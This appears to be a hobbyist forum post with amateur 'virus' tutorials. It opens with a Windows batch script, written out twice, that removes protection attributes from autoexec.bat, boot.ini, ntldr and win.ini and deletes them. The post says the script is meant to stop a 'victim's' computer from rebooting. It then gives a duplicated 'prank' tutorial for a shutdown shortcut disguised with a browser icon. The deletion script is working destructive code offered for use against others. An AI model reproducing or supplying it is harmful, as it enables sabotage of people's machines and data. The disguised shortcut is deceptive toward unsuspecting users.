Open notepad and copy/paste this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Now Save it as a .bat file.
Change the file type to all files
This should shut-down the victims computer and deletes the files needed to reboot and restart.
*Dont try it on your own pc it will delete the file needed to reboot...*
---- your comments are welcomed-----
Fake shut-down virus (itz harm less)
This “virus” can shutdown, restart and log off your pc (Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking Start>Turn off....
And absolutely the best thing about this virus is that you can make a fun prank to your friend... :D
Now lets start with the tutorial.
1- Create a shortcut (Right click on your desktop and go to new -> shortcut )
2- After this will appear window and that is where you type the code shutdown -s -t 300 -c "Your Message"
To log of computer type shutdown -l -t 300 -c “your message”
To restart computer type shutdown -r -t 300 -c ” your message”
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.
3- Click Next, Finish
4- After this will appear icon on desktop, when someone click it, shutdown box will pops up.
Also you can change the look of your icon (Right click on the icon -> Properties -> Shortcut -> Change Icon and replace it with you r own one, like Internet Explorer or Mozilla Firefox...) And there you are with your fake virus now just to click on it...
Fake shut-down virus (itz harm less)
This “virus” can shutdown, restart and log off your pc (Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking Start>Turn off....
And absolutely the best thing about this virus is that you can make a fun prank to your friend... :D
Now lets start with the tutorial.
1- Create a shortcut (Right click on your desktop and go to new -> shortcut )
2- After this will appear window and that is where you type the code shutdown -s -t 300 -c "Your Message"
To log of computer type shutdown -l -t 300 -c “your message”
To restart computer type shutdown -r -t 300 -c ” your message”
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.
3- Click Next, Finish
4- After this will appear icon on desktop, when someone click it, shutdown box will pops up.
Also you can change the look of your icon (Right click on the icon -> Properties -> Shortcut -> Change Icon and replace it with you r own one, like Internet Explorer or Mozilla Firefox...) And there you are with your fake virus now just to click on it...